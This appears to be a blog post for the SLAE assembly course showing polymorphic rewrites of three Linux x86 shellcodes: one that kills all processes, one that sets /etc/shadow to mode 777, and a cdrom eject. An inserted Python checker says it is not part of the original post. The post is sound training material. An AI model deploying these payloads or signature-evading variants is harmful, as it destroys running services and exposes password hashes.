danielsauder

IT security is a matter of trust.

SLAE Assignment 6: Polymorphic Shellcode

This assignment is about writing polymorphic versions of shellcodes downloaded from shell-storm.org.

Kill all Processes Shellcode

I want to start with a simple one, a shellcode for killing processes, which can be found at http://www.shell-storm.org/shellcode/files/shellcode-212.php.
Here is the original assembler code:

killall_orig.nasm

section .text

      global _start

_start:
; kill(-1, SIGKILL)

     push byte 37
     pop eax
     push byte -1
     pop ebx
     push byte 9
     pop ecx
     int 0x80

And this is my version:

killall.nasm

section .text

    global _start

_start:
; kill(-1, SIGKILL)

    xor ecx, ecx
    mul ecx             ; eax = eax * ecx = 0, and edx = 0 as a side effect
    mov al, byte 37     ; SYS_kill
    dec ebx             ; ebx = -1, assuming ebx is 0 on entry (true for a fresh process, not guaranteed for injected code)
    mov cl, byte 9      ; SIGKILL
    int 0x80

The shellcode is the same size as the original shellcode.
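To check that the two killall variants really reach int 0x80 with the same kill(2) arguments in eax, ebx and ecx, here is an added example (my own code, not part of the original post): a minimal interpreter for the few instructions used above, with the hypothetical helpers run() and equivalent(). It also makes the precondition of the polymorphic version visible: dec ebx only yields -1 when ebx is zero on entry, which holds for a fresh process but not necessarily for code injected into a running one.

```python
# Added example, not code from the original post: a minimal register-level interpreter
# for the few x86-32 instructions the killall shellcodes use (hypothetical helper).
MASK = 0xFFFFFFFF
LOW8 = {"al": "eax", "bl": "ebx", "cl": "ecx", "dl": "edx"}

ORIGINAL = ["push byte 37", "pop eax", "push byte -1", "pop ebx",
            "push byte 9", "pop ecx", "int 0x80"]
POLYMORPHIC = ["xor ecx, ecx", "mul ecx", "mov al, byte 37",
               "dec ebx", "mov cl, byte 9", "int 0x80"]

def run(listing, init=None):
    """Execute NASM-style lines until int 0x80; return the kill() syscall registers."""
    r = {"eax": 0, "ebx": 0, "ecx": 0, "edx": 0}   # fresh-process state unless overridden
    r.update(init or {})
    stack = []
    for line in listing:
        op, *args = line.replace(",", " ").split()
        args = [a for a in args if a != "byte"]    # size hints do not change semantics here
        if op == "int" and args == ["0x80"]:
            return {k: r[k] for k in ("eax", "ebx", "ecx")}
        if op == "push":                           # push imm8, sign-extended to 32 bits
            stack.append(int(args[0], 0) & MASK)
        elif op == "pop":
            r[args[0]] = stack.pop()
        elif op == "xor":
            r[args[0]] ^= r[args[1]]
        elif op == "mul":                          # edx:eax = eax * r32
            prod = r["eax"] * r[args[0]]
            r["eax"], r["edx"] = prod & MASK, (prod >> 32) & MASK
        elif op == "dec":
            r[args[0]] = (r[args[0]] - 1) & MASK
        elif op == "mov" and args[0] in LOW8:      # mov r8, imm8 leaves the upper 24 bits alone
            full = LOW8[args[0]]
            r[full] = (r[full] & 0xFFFFFF00) | (int(args[1], 0) & 0xFF)
        else:
            raise ValueError("unsupported instruction: " + line)
    raise ValueError("no int 0x80 reached")

def equivalent(init=None):
    """True when both variants reach int 0x80 with identical eax, ebx and ecx."""
    return run(ORIGINAL, init) == run(POLYMORPHIC, init)

if __name__ == "__main__":
    print(run(ORIGINAL), run(POLYMORPHIC))
    print("fresh process:", equivalent())                      # True
    print("injected with ebx != 0:", equivalent({"ebx": 5}))   # False
```

Garbage in eax or ecx on entry does not matter, because mul and xor clear them; only ebx is taken on trust.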

chmod /etc/shadow 777

The second example is a shellcode that executes chmod 777 on /etc/shadow. The original code can be found at http://www.shell-storm.org/shellcode/files/shellcode-590.php.
Here is the original code in Intel syntax:

chmod_orig.nasm

section .text

    global _start

_start:
    xor eax, eax
    push eax            ; NUL terminator for the path
    mov al, 0xf         ; SYS_chmod = 15
    push 0x776f6461     ; "adow"
    push 0x68732f63     ; "c/sh"
    push 0x74652f2f     ; "//et"  -> "//etc/shadow"
    mov ebx, esp        ; ebx = pointer to the path
    xor ecx, ecx
    mov cx, 0x1ff       ; mode 0777
    int 0x80
    inc eax             ; chmod returned 0 on success, so eax becomes 1 = SYS_exit
    int 0x80


And here is my version of the code. I used the JMP-CALL-POP technique to change the code.

chmod.nasm

section .text

    global _start

_start:
    jmp short call_shellcode

shellcode:
    pop ebx             ; ebx = address of "/etc/shadow", pushed by the call below
    xor ecx, ecx
    mul ecx             ; eax = edx = 0 without a second xor
    mov al, 0xf         ; SYS_chmod = 15
    mov cx, 0x1ff       ; mode 0777
    int 0x80
    inc eax             ; chmod returned 0 on success, so eax becomes 1 = SYS_exit
    int 0x80

call_shellcode:
    call shellcode
    ; no trailing NUL: the path relies on a zero byte following the shellcode in memory
    ; (for example the terminator of the C test harness's string)
    message db "/etc/shadow"

The original shellcode has a size of 33 bytes, mine is 34 bytes long.

Eject cdrom

The original shellcode can be found at http://www.shell-storm.org/shellcode/files/shellcode-563.php.
And here it is:

cdrom_orig.nasm

; linux/x86 eject /dev/cdrom 42 bytes
; root@thegibson
; 2010-01-08
 
section .text
    global _start
 
_start:
    ; open("/dev/cdrom", O_RDONLY | O_NONBLOCK);
    mov al, 5
    cdq
    push edx
    push word 0x6d6f
    push dword 0x7264632f
    push dword 0x7665642f
    mov ebx, esp
    mov cx, 0xfff
    sub cx, 0x7ff
    int 0x80
 
    ; ioctl(fd, CDROMEJECT, 0);
    mov ebx, eax
    mov al, 54
    mov cx, 0x5309
    cdq
    int 0x80

And here is my version:

cdrom.nasm

section .text

    global _start

_start:
    jmp short call_shellcode

shellcode:
    ; open("/dev/cdrom", O_RDONLY | O_NONBLOCK);
    pop ebx             ; ebx = address of "/dev/cdrom", pushed by the call below
    xor ecx, ecx
    xor eax, eax
    mov al, 5           ; SYS_open
    mov cx, 0xfff
    sub cx, 0x7ff       ; 0x800 = O_NONBLOCK (O_RDONLY is 0)
    int 0x80

    ; ioctl(fd, CDROMEJECT, 0);
    cdq                 ; eax holds the (non-negative) fd, so edx = 0
    mov ebx, eax        ; ebx = fd
    mov al, 53
    inc eax             ; 53 + 1 = 54 = SYS_ioctl
    mov cx, 0x5309      ; CDROMEJECT
    int 0x80

    ; exit(0)
    mov al, 1           ; ioctl returned 0, so eax becomes 1 = SYS_exit
    xor ebx, ebx
    int 0x80

call_shellcode:
    call shellcode
    ; no trailing NUL: the path relies on a zero byte following the shellcode in memory
    ; (for example the terminator of the C test harness's string)
    message db "/dev/cdrom"

As in the previous example I used JMP-CALL-POP to change the code. Furthermore I changed the order of the instructions, and instead of loading the ioctl syscall number directly I load a value one less and increment it afterwards. I also added an exit call, which was not necessary in the previous example.
The original shellcode is 42 bytes long, mine is 53 bytes.

Get the code.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-342
